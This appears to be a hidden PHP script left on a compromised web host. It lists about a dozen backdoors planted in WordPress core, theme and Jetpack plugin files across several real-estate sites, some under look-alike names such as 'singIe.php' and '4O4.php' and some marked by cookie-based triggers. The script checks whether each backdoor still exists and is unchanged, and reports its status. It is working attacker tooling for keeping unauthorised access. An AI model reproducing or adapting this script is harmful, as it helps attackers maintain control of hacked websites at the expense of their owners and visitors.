File: //var/tmp/.rjust
<?php $r = '/home/jonkrack/oldmontanahomes.com'; $x = ["/wp-includes/bookmark.php"=>"bd@@345905@@secure_access",
"/wp-includes/category-template.php"=>"bd@@323540@@Feature-Policy",
"/wp-content/themes/search_template_1751702625/singIe.php"=>"bd@@438799@@727",
"/wp-content/themes/home-1748013144/sldebar.php"=>"bd@@249649@@727",
"/719AspenGrove/wp-includes/user.php"=>"bd@@380721@@_COOKIE[3]",
"/109timberedterracewhitefish.com/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-search/build/dashboard/jp.search.dashboard.asset.php"=>"bd@@381045@@1037",
"/8CedarPointe/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-wordads/src/dashboard/class.dashboard.php"=>"bd@@351350@@1023",
"/109timberedterracewhitefish.com/wp-includes/widgets/class-wp-widget-tag-cloud.php"=>"bd@@380547@@4",
"/wp-content/themes/custom-file-2-1757847677/4O4.php"=>"bd@@459658@@967",
"/Marmot4000/wp-includes/SimplePie/Enclosure.php"=>"bd@@362965@@$_COOKIE[2",
"/140TimberedTerrace/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-wordads/build/dashboard/jp.wordads.dashboard.asset.php"=>"bd@@350434@@535"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');